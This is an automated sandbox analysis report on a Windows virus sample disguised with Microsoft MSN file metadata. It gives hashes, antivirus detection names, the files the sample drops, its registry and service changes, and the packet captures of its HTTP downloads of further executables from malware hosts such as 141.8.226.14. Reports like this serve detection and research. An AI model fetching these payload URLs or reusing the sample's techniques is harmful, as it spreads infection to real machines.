Analysis Date2015-08-30 11:20:15
MD5c9b17dde4ffbb93d9bebee5d49fbcdd6
SHA19a45d667150027cc0dd09638b290b85256fbc8c8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section.data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section.rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
SectionX?5u{ md5: 6e9028c14083aab97d818b53c679d592 sha1: 8fa08cd2bbe11ef69285ed42e9d65289b3b4840d size: 20480
Section.tcP md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672
SectionW>5u md5: ad096de7c08a19a2366280a611bcd840 sha1: a3e5a3ffbb76b5052344ae48969951efc4bd89b4 size: 20480
Timestamp2001-07-19 19:30:07
Pdb pathpdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhashd14359c764871eefcea91a43199f94d9fdae9506
IMPhash6df6e99bae10817058127898c796b82d
AVRisingWin32.Roue.a
AVMcafeeW32/Kudj
AVAvira (antivir)W32/Jadtre.B
AVTwisterVirus.558BEC81EC@120000#.mg
AVAd-AwareWin32.VJadtre.3
AVAlwil (avast)Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF
AVEset (nod32)Win32/Wapomi.BA virus
AVGrisoft (avg)Win32/Wapomi.I
AVSymantecW32.Wapomi.C!inf
AVFortinetW32/Nimnul.F
AVBitDefenderWin32.VJadtre.3
AVK7Virus ( 0040f7441 )
AVMicrosoft Security EssentialsVirus:Win32/Mikcer.B
AVMicroWorld (escan)Win32.VJadtre.3
AVMalwareBytesTrojan.FakeMS.ED
AVAuthentiumW32/PatchLoad.E
AVFrisk (f-prot)W32/PatchLoad.E
AVIkarusTrojan-Downloader.Win32.Small
AVEmsisoftWin32.VJadtre.3
AVZillya!Virus.Nimnul.Win32.5
AVKasperskyVirus.Win32.Nimnul.f
AVTrend MicroPE_WAPOMI.BM
AVCAT (quickheal)W32.Nimnul.F1
AVVirusBlokAda (vba32)Virus.Nimnul.19209
AVPadvishno_virus
AVBullGuardWin32.VJadtre.3
AVArcabit (arcavir)Win32.VJadtre.3
AVClamAVWin.Trojan.Downloader-64296
AVDr. WebBackDoor.Darkshell.246
AVF-SecureWin32.VJadtre.3
AVCA (E-Trust Ino)Win32/Nimnul.A

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\temp\files\bdGiXz.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\temp\files\malware.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\temp\files\AcroRd32.exe
Creates FileC:\temp\files\AcroRd32Info.exe
Creates FileC:\temp\files\bdGiXz.exe
Creates FileC:\temp\files\Expor.exe
Creates FileC:\temp\files\setup.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\temp\files\instmsiw.exe
Creates FileC:\temp\files\malware.exe
Creates FileC:\temp\files\OzQTai.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FileC:\temp\files\reader_sl.exe
Creates FilePIPE\lsarpc
Creates FileC:\temp\files\Digcore.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\temp\files\msnsusii.exe
Creates FileC:\temp\files\AdobeUpdateManager.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\temp\files\monitor.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\temp\files\Msncli.exe
Creates FileC:\temp\files\acroaum.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File\Device\Afd\Endpoint

Process
↳ Pid 812

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\DRIILV1F\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ATC3U5MX\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\6YQ91KCM\desktop.ini
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0J2L45O7\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS141.8.226.14
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com
Winsock URLhttp://141.8.226.14/ko/03.exe
Winsock URLhttp://141.8.226.14/ko/02.exe

Process
↳ Pid 1212

Process
↳ Pid 1300

Process
↳ Pid 1860

Process
↳ Pid 1176

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

Network Details:

DNSnbtj.114anhui.com
Type: A
193.166.255.171
DNSwww.a.shifen.com
Type: A
103.235.46.39
DNSpc1.114central.com
Type: A
141.8.226.14
DNSddos.dnsnb8.net
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://141.8.226.14/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://nbtj.114anhui.com/msn/163.htm?2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1037 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1039 ➝ 193.166.255.171:80
Flows TCP192.168.1.1:1040 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1041 ➝ 141.8.226.14:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d736e 2f313633 2e68746d   GET /msn/163.htm
0x00000010 (00016)   3f322048 5454502f 312e300d 0a416363   ?2 HTTP/1.0..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000070 (00112)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000080 (00128)   290d0a48 6f73743a 206e6274 6a2e3131   )..Host: nbtj.11
0x00000090 (00144)   34616e68 75692e63 6f6d0d0a 436f6e6e   4anhui.com..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
f
......
f

000004E4
040904B0
%1 is an unimplemented method
6.10.0016.1624
about
accessimage
activeborder
activecaption
Adc#
ANSI(00)
application/x-javascript
application/x-shockwave-flash
application/x-unknown
application/x-vbscript
appworkspace
.asa
.asp
audio/wav
autoupdate
background
.BAK.{FEC69D39-ADBA-4928-98F0-3571AA97ABDF}
{BB7E11D6-5E67-4005-A530-ED1831D6A427}
.bmp
bold
bolder
border
bottom
Built by
buttonface
buttonhighlight
buttonshadow
buttontext
ByteCount
captiontext
@CBitmapSurface::EnableDefaultMappings
CBitmapSurface::SetMapping
CMarsProtStreamWrapper::Clone
CMarsProtStreamWrapper::Commit
CMarsProtStreamWrapper::CopyTo
CMarsProtStreamWrapper::LockRegion
CMarsProtStreamWrapper::Revert
@CMarsProtStreamWrapper::SetSize
CMarsProtStreamWrapper::UnlockRegion
CompanyName
content
Control Panel\Appearance
copymar
COPYMAR
copymar.exe
Copyright (C) Microsoft Corp. 1981-2000
.css
Current
Daily
.dat
default
desc
disabled
dkshadow
@donotdither
{E8055863-4956-4cbf-9CA5-46FF053A904C}
emars.ini
exceeded maximum command-line args %d
face
facetext
file
FILE
FileDescription
FileVersion
ForceReadOnlyMarchive
foreground
generaldialogs
.gif
gopher
graytext
Hardware\Description\System\CentralProcessor\0
hasfocus
High Contrast
highlight
highlighttext
hilight
hovered
hoverpressed
.htc
.htm
http
http://207.46.176.247/guidgen/guidgen.dll
@http://207.46.176.247/msndata-bvt/mdserver.dll
http://207.46.176.247/msndata/mdserver.dll
https
http://sqm.msn.com/guidgen/guidgen.dll
http://sqm.msn.com/msndata/mdserver.dll
image
image/bmp
image/gif
imageinfo.mii
@imageinfo.xml
image/jpeg
imagelist
image/pjpeg
image/png
image/x-png
inactiveborder
inactivecaption
inactivecaptiontext
infobackground
infotext
instantmsgr
instantmsgr_tabs
InternalName
italic
javascript
.jpg
left
LegalCopyright
light
lighter
local
logon
MachineInstID
mailto
manifest.xml
.MAR
MarsDataTest
marslib module %s started
MARS_ONLOAD
marsperf.log
MarsPerf shutdown
measure
mediaplayer
menu
menu_background
menubold
menutext
menu_text
~MHz
Microsoft Corporation
Microsoft(R) MSN (R) Communications System
.mii
Mode
#MSHTML#PERF#
msn://
MSN6
MSN6\
MSN6.INI
MSN Archive: Checksum Mismatch in file %s: %s
@MSN Archive Stability
msnbld
msndata
MSN is uploading non-personal data to improve our quality of service.  To disable this monitoring, go to My Settings.
msn://@ui.mar@/chanbar.htm
msnupdate!@#@.exe
.mti
name
 NavigateURL Complete
nccaption
ncmenu
ncsmcaption
ncstatus
.NEW.{9D6EAA4F-27B2-4407-AC72-4BBD2FCB6ED1}
news
nntp
normal
numimages
@OLPerf.dat
OriginalFilename
other
places
.png
popup
pressed
ProductName
ProductVersion
progress
rect
res://
right
RunCount
%s%08lX
scrollbar
searchbar
SelfHost
semibold
%s : fatal error -: 
shadow
shell
ShipFlags
sidebar
.skn
snews
Software\Microsoft\Mars\Performance
%s: %s
statusbar
StreamHandle
StreamName
strikeout
StringFileInfo
.swf
 %s%x
system
System\CurrentControlSet\Control\FontAssoc\Associated Charset
System\CurrentControlSet\Control\Terminal Server
telnet
text
text/css
text/html
text/plain
text/x-component
text/xml
threeddarkshadow
threedface
threedhighlight
threedshadow
tinycrt
titlebar
titlebar_text
toolbar
Translation
TSAppCompat
.txt
underline
update.exe
UseSysColors
ValidateMarchiveChecksums
VarFileInfo
.vbs
vbscript
VS_VERSION_INFO
wais
.wav
window
windowframe
windowtext
X-Description
.xml
@.xsl
                                                           
                                                                                 
  ---------      -------      ---------   ----------
------    ---------    --------      -------      -------
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
"#$%&'(
)*+,-.
#&'(+./
						
							
								
									
    !!!!""""####$$$$%%%%&&&&''''(((())))*****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<<====>>>>?
    !!!!""""####$$$$%%%%&&&&''''(((())))****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<<==>>???
    !!!!""""####$$$$%%%%&&&&''''(((())))****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<=
 0+020e0k0
0,0A0^0s0
012345678
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
08101BB
 (08@P`p
0d1112131415161718191:1;1<1=1>1?1@1A1B1C1D1E1F1G1H1I1J1K1L1M1N1
0j/0@0E0R0f0
0T0X0\0`0d0h0l0p0t0x0|
0xIJD/
1000 us == 1ms == 0.001 s == 3.17e-11 years
[1\1]1^1_1`1
%11s   %11s   %11s   %s
!%)-16:>BFJNRVZ^cgkosw{
!)1:BJRZcks{
1=>=F=
:1G1P1]1
1K1Z1h1
)1$N*)Q&`[U
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2M+-'3
2T2d2{2
??2@YAPAXI@Z
3$30l3Xk
343=3B3j3p3|3
*37}Cg
%3d.%03d s
;3D;H;L
@3T3e3
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
6.10.0016.1624
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
%6d  %11s   %11s   %11s   %s
%6d us
7.{645FF040
7FC663
7@ip:K
?7N7T7]
	8 [[@
8-00AA
@.&'85
88888888888888888888888888888888888888888888
>!>*>8>B>H>V>`>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9.t,W3
9.t+W3
9.:U:p:}:
a1b1c1
A4J4Y4_4
A67-586
.adata
advapi32.dll
ADVAPI32.dll
AE4C57'
agX \s
a Play
appmgmts.dlld
.aspack
"bd	WVS
BefJ<Z0
bgTLOkN
browser
C1E870B0C
[!Calculated durations follow:]
#Calls    TotalTime    AvgTime*      MaxTime      EvtName
CancelConne
 cannot be run i
CCDCEF
CloseHandle
CoCreateInstance
CoInitialize
COMCTL32.dll
ConvertINetMultiByteToUnicode
ConvertINetUnicodeToMultiByte
copymar.pdb
Copyro
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CP<Z<|<
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateEventA
CreateEventW
CreateFileA
CreateFileMappingA
CreateFileMappingW
CreateFileW
CreateProcessA
CreateStreamOnHGlobal
crypt'c
CryptReleaseContext
<<<<<<<<<<<<<<<<<<<<<<<<<==>??@D.
D0H0L0PM
DA-6D69-472e-8981-DBC71
`.data
Ddk h$
DecodeImage
default
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
(D/fc_oL
dleAu7
DOS mode.
dU5 B~
&=,=D=v=
E2<2wz
E8J8O8[8`8i8o8z8
eEf=ghfijklimnf=o
eHanu@
[!End Mars perf]
[End Mars Perf Statistics]
EnterCriticalSection
ep1'*"/
eParam$
!Error! Fatal error encountered. Results may be inaccurate.
Esht*6
;E sYSV
ExecuUA
ExitProcess
Expor.exe
~f	2bY
F??3@YAXP
^f9r$u.f
F	B^^Vd
f+D?	D
FlushFileBuffers
f=pqrst
GDI32.dll
GetACP
GetAtomNameA
GetCommandLineA
GetCurrentDirectoryA
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetFileSize
GetImageInfo
GetLastError
GetLocalTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMuR
GetObjectA
GetObjectW
GetPaletteEntries
GetPrivateProfileIntA
GetPrivateProfileIntW
GetPrivateProfileStringA
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessTimes
GetStdHandle
GetSysColor
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempFileNameA
GetTempPathA
GetTickCount
GetVersionExA
GetVersionExW
GlobalAddAtomA
GlobalDeleteAtom
GlobalMemoryStatus
h1l1.T
HeapAlloc
hlBT7!2
Hur3'$
iD&YomH
ifyTrLo
igVCRT
IMGUTIL.DLL
InfGma
ingCompatibil
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IntersectRect
Invalid Atom
IocSymd
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
i|tlh`
IXR-!m
_;i;z;
j0h0%@
 -k 4/
kca:\lsa
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KEveny
K,j(QV
KLMNOP
K:\Q.pdb`q
L5PFHP7b
LeaveCriticalSection
LOADER ERROR
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
lp6a J
lstrcatA
lstrcmpA
lstrcpynA
lstrlenA
lstrlenW
m1\U\Kcn
MapViewOfFile
MARCV9
[Mars Perf Statistics  %d total  %d:%02d:%02d   %d/%d/%02d]
M:d:m:
MessageBoxA
MessageBoxW
MLANG.DLL
{mo?F&
MoveFileA
MSN Gam
;M s\SW
msvcrt.dll
MSVCRT.dll
MultiByteToWideChar
*note: average time doesn't include the MaxTime entry
 NT\Curr
NtQu9y
Nv`mG}
O1P1Q1R1S1T1
oduluI
OffsetRect
oft\Wud
ole32.dll
OLEAUT32.dll
o@P3e4
Op-;4$
~OPEN=-
OpenProcessToken
+OpsSCM
|otB.8
,ov\A}
PathAppendW
PathCombineW
PathFileExistsA
PathFindFileNameW
PathIsRelativeW
PathRemoveFileSpecA
PathRemoveFileSpecW
[PerfFreq=%7d/s  *-since start :-duration %2d%% buffer used]
pVKwOf
PVVh@,@
P;Z;d;n;x;
q$A3<.
qidu.com
#]Q)/=J
QQQQQQQ
QQSVW3
QueryPerformanceCounter
QueryPerformanceFrequency
QWn,n#
\Ra7207
RaiseException
 `.rdat[
.rdata
RealizePalette
RECYCLER
RegCloseKey
RegisterWindowMessageA
RegisterWindowMessageW
RegOpenKeyExA
RegOpenKeyExW
RegQueryValueExA
RegQueryValueExW
ReleaseDC
.reloc
Remote
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
S1[1`1m1
{schedsvc
SDPSRV
SelectObject
SelectPalette
SetBkMode
SetDIBColorTable
SetEvent
SetFilePointer
SetStretchBltMode
SetTextColor
SHCreateShellPalette
SHCreateStreamOnFileW
shell32.dll
SHELL32.dll
SHFOLDER.dll
SHGetInverseCMAP
SHGetSpecialFolderPathA
SHGetValueW
shlwapi.dll
SHLWAPI.dll
SHStrDupW
s\mars\setup\copymar\obj\i386\copymar.pdb
SOFTWARE\Mi
Sp`FFF
: %s - %S
* %s - %S
[!Start Mars perf   Ver(%s)   %d:%02d:%02d   %d/%d/%02d ]
  StartTime      EndTime      TotalTime   Event Name
StrCatBuffA
StrCatBuffW
StrCmpIW
StrCmpNW
StrCpyNW
StrStrIW
StrToIntW
s_/UYY
SVWjF3
swsocknetman1ssdp
SystemParametersInfoA
SystemParametersInfoW
.tcLCI0
TerminateProcess
.textVT
The ordinal %u could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
_This #g
!This program cannot be run in DOS mode.
tKh\#@
tl`TDi
ToFilnH
tQVVVj
tTisrv
t.;t$$t(
TUUUUU+
t?VVVj
tWh4V@
?%_#txg
U1V1W1X1Y1Z1
u6AQVj
>"u:F@
	U;MhOy
uMpr.{
UnmapViewOfFile
#upnphostKn&s
URLDown
URLDownloadToFileA
urlmon.dll
user32.dll
USER32.dll
UUUUUUU
UVWXYZ[
V3_3o3x3
v5SUW3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
 ;/VDA
VERSION.dll
v|htcL
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW
?w"^D{
WideCharToMultiByte
 winsta0
WithTag	
WmdmPmSN'Fa
wnsprintfA
wnsprintfW
WO$_9E
Wqct q!
Writea7
WriteFile
wsprintfA
wvnsprintfA
wvnsprintfW
<	=x=}=
/X,.CC
 X -ibcB"
<)<.<X<i<o
xmlpbS
{+xN{?ODBE
XPTPSW
XPVSSG
XRichS
XVQPjB
xwuLEwE
XX; tg
/;%y;~;
.y!GN&
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
Zh&wP}M
@z}]u2o
zudWWWW